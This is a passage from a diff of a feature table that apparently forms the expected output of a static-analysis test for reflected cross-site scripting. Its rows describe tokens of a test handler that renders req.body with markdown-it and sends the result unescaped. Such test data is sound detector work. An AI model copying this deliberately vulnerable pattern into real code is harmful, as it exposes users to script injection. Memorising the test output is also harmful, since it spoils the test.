contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:23:102:25 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:23:102:25 | use | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:23:102:25 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:23:102:25 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:33 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:33 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:33 | require | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:33 | require | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:33 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:58 | exceptional return of require ... tizer') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:58 | exceptional return of require ... tizer') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:58 | exceptional return of require ... tizer') | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:58 | exceptional return of require ... tizer') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:58 | exceptional return of require ... tizer') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:58 | require ... tizer') | CalleeFlexibleAccessPath | markdownIt.use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:58 | require ... tizer') | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:27:102:58 | require ... tizer') | calleeImports | markdown-it | @@ -20214,6 +134959,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:35:102:57 | 'markdo ... itizer' | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:35:102:57 | 'markdo ... itizer' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:35:102:57 | 'markdo ... itizer' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:61:102:66 | render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:61:102:66 | render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:61:102:66 | render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:61:102:66 | render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:61:102:66 | render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:70 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:70 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:70 | req | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:70 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:70 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:75 | req.body | CalleeFlexibleAccessPath | markdownIt.use().render | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:75 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:75 | req.body | calleeImports | markdown-it | @@ -20222,6 +134977,81 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:75 | req.body | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:75 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:68:102:75 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:72:102:75 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:72:102:75 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:72:102:75 | body | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:72:102:75 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:72:102:75 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:5 | res | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:10 | res.send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | exceptional return of res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | exceptional return of res.sen ... .body)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | exceptional return of res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | exceptional return of res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | exceptional return of res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | res.sen ... .body)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:3:103:85 | res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:7:103:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:7:103:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:7:103:10 | send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:7:103:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:7:103:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:21 | markdownIt | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:21 | markdownIt | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:21 | markdownIt | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:21 | markdownIt | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:21 | markdownIt | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:25 | markdownIt.use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:25 | markdownIt.use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:25 | markdownIt.use | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:25 | markdownIt.use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:25 | markdownIt.use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | exceptional return of markdow ... abbr')) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | exceptional return of markdow ... abbr')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | exceptional return of markdow ... abbr')) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | exceptional return of markdow ... abbr')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | exceptional return of markdow ... abbr')) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | markdow ... abbr')) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | markdow ... abbr')) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | markdow ... abbr')) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | markdow ... abbr')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:54 | markdow ... abbr')) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:58 | markdow ... ')).use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:58 | markdow ... ')).use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:58 | markdow ... ')).use | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:58 | markdow ... ')).use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:58 | markdow ... ')).use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | exceptional return of markdow ... nknown) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | exceptional return of markdow ... nknown) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | exceptional return of markdow ... nknown) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | exceptional return of markdow ... nknown) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | exceptional return of markdow ... nknown) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | markdow ... nknown) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | markdow ... nknown) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | markdow ... nknown) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | markdow ... nknown) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:67 | markdow ... nknown) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:74 | markdow ... .render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:74 | markdow ... .render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:74 | markdow ... .render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:74 | markdow ... .render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:74 | markdow ... .render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | exceptional return of markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | exceptional return of markdow ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | exceptional return of markdow ... q.body) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | exceptional return of markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | exceptional return of markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | markdow ... q.body) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | markdow ... q.body) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -20230,6 +135060,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:12:103:84 | markdow ... q.body) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:23:103:25 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:23:103:25 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:23:103:25 | use | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:23:103:25 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:23:103:25 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:33 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:33 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:33 | require | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:33 | require | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:33 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:53 | exceptional return of require ... -abbr') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:53 | exceptional return of require ... -abbr') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:53 | exceptional return of require ... -abbr') | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:53 | exceptional return of require ... -abbr') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:53 | exceptional return of require ... -abbr') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:53 | require ... -abbr') | CalleeFlexibleAccessPath | markdownIt.use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:53 | require ... -abbr') | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:27:103:53 | require ... -abbr') | calleeImports | markdown-it | @@ -20247,6 +135092,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:35:103:52 | 'markdown-it-abbr' | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:35:103:52 | 'markdown-it-abbr' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:35:103:52 | 'markdown-it-abbr' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:56:103:58 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:56:103:58 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:56:103:58 | use | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:56:103:58 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:56:103:58 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:60:103:66 | unknown | CalleeFlexibleAccessPath | markdownIt.use().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:60:103:66 | unknown | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:60:103:66 | unknown | calleeImports | markdown-it | @@ -20255,6 +135105,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:60:103:66 | unknown | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:60:103:66 | unknown | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:60:103:66 | unknown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:69:103:74 | render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| 